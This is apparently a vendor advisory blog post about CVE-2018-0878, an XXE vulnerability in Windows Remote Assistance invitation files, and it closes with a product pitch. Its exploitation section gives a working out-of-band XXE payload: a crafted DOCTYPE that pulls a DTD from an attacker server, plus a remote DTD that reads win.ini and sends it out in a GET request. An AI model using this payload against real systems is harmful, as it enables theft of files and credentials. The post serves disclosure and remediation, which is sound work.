Windows Remote Assistance Needs Assistance

  • Post author:
  • Reading time:4 mins read

remote assistanceImage courtesy: maketecheasier.com

Need help to fix your Windows PC? Well, Windows Remote Assistance (MSRA) has a lot to offer than just help, it can get you hacked! An XXE (XML External Entity) vulnerability affecting all the versions of Windows till date including Windows 7, 8.1, RT 8.1 and 10. The vulnerability can reveal sensitive information, an attacker may devise a exploit to target specific log/config file containing username/passwords. However, This vulnerability has been assigned CVE-2018-0878. and can be remediated using a vulnerability management solution.


Technical Jargon

Microsoft Windows offer Remote Assistance functionality to assist or get assistance from someone you trust in order to fix a problem. Like a patch management solution.

windows remote assistance panel

If you’re looking for help, you’ll go for the second option which will land you on the next screen.

windows remote assistance

Now as we want to examine the file, we’ll choose the first option to save this invitation as a file.

Command

Opening the Invitation.msrcincident file reveals XML data with a lot of parameters and values.

invitation details

Where there is XML, there can be XXE vulnerabilities. They have a history of leading to information disclosure, remote code execution and many more. MSRA uses MSXML3 to parse the XML data. MSXML3 has had a few vulnerabilities in the past but no details disclosed.


Exploitation Method

MSRA hides the output of the processed XML, making it hard to validate. To make this exploit work, the requested data needs to be out from the victim’s machine. Therefore there’s a need to use a technique called Out-of-Band Data Retrieval discovered by the researchers Alexey Osipov and Timur Yunusov that allow the construction of a URL with data coming from other entities.

Using the above technique, the modification of the Invitation.msrcincident file is to be as follows

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.80:8080/xxe.xml">
%remote;%root;%oob;]>

On the server a file xxe.xml created with the following content:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.80:8080/?%payload;'>
">

Opening the now modified Invitation.msrcincident file results in sending contents of the C:\Windows\win.ini as part of the get request sent to server.


Impact

If exploited, any kind of sensitive information revealed from logs to usernames to passwords.


Solution

Microsoft released a patch on 13 March, 2018.  For downloading the patch for respective operating system click here.


SecPod Saner detects these vulnerabilities and automatically fixes it by applying security updates. Download Saner now and keep your systems updated and secure.